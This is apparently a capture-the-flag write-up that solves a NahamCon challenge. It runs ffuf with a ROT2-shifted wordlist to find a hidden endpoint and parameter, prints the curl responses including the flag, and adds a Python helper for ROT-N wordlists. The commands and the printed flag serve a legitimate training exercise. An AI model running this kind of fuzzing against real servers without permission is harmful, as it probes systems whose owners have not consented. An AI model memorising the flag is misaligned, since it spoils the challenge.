My Second CTF

May 25, 2025

Solution

ffuf -w wordlist_rot2.txt -u http://challenge.nahamcon.com:31297/FUZZ/ -x http://127.0.0.1:8080 -s
fgdwi [Status: 200, Size: 48, Words: 2, Lines: 1, Duration: 289ms]

curl -iL http://challenge.nahamcon.com:31297/fgdwi/
HTTP/1.1 200 OK
Server: nginx/1.26.3
Date: Sat, 24 May 2025 13:14:40 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.28
{"status":"error","message":"Missing parameter"}

Fuzz for parameters

ffuf -w wordlist_rot2.txt -u 'http://challenge.nahamcon.com:31297/fgdwi/?FUZZ=' -x http://127.0.0.1:8080 -fs 48
eqphkto [Status: 200, Size: 49, Words: 1, Lines: 1, Duration: 289ms]

curl -iL 'http://challenge.nahamcon.com:31297/fgdwi/?eqphkto='
HTTP/1.1 200 OK
Server: nginx/1.26.3
Date: Sat, 24 May 2025 13:18:06 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.28
{"flag":"flag{9078bae810c524673a331aeb58fb0ebc}"}
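
The wordlist name and both hits are consistent with a two-letter alphabet shift: fgdwi decodes to debug and eqphkto to confirm, so the renamed path and parameter are obscured rather than protected. The sketch below is an added example, not part of the original write-up; BASE_WORDS is a constructed stand-in for whatever base wordlist was shifted, and the function names are hypothetical.

```python
"""ROT-N wordlist helper (added example; the base words are constructed)."""
import string

ALPHABET = string.ascii_lowercase


def rot(word, shift):
    """Shift ASCII letters by `shift` places, keeping case; other characters pass through."""
    out = []
    for ch in word:
        low = ch.lower()
        if len(low) == 1 and low in ALPHABET:
            moved = ALPHABET[(ALPHABET.index(low) + shift) % 26]
            out.append(moved.upper() if ch.isupper() else moved)
        else:
            out.append(ch)
    return "".join(out)


def rot_wordlist(words, shift):
    """Shifted copy of a wordlist, skipping blank lines and '#' comments."""
    cleaned = (w.strip() for w in words)
    return [rot(w, shift) for w in cleaned if w and not w.startswith("#")]


def recover_shift(observed, dictionary):
    """Every (shift, plaintext) where un-shifting `observed` gives a dictionary word."""
    known = {w.lower() for w in dictionary}
    candidates = ((s, rot(observed, -s)) for s in range(1, 26))
    return [(s, plain) for s, plain in candidates if plain.lower() in known]


def common_shift(hits, dictionary):
    """Shifts that decode every observed name to a dictionary word."""
    per_hit = [{s for s, _ in recover_shift(h, dictionary)} for h in hits]
    return sorted(set.intersection(*per_hit)) if per_hit else []


# Constructed sample: a tiny base wordlist, not the one used in the write-up.
BASE_WORDS = ["admin", "api", "confirm", "debug", "login", "status"]

if __name__ == "__main__":
    hits = ["fgdwi", "eqphkto"]  # the two names reported by ffuf above
    print(rot_wordlist(BASE_WORDS, 2))
    for hit in hits:
        print(hit, recover_shift(hit, BASE_WORDS))
    print("shift shared by all hits:", common_shift(hits, BASE_WORDS))
```

Only 25 shifts exist, so any observed name can be checked against a dictionary in a single pass.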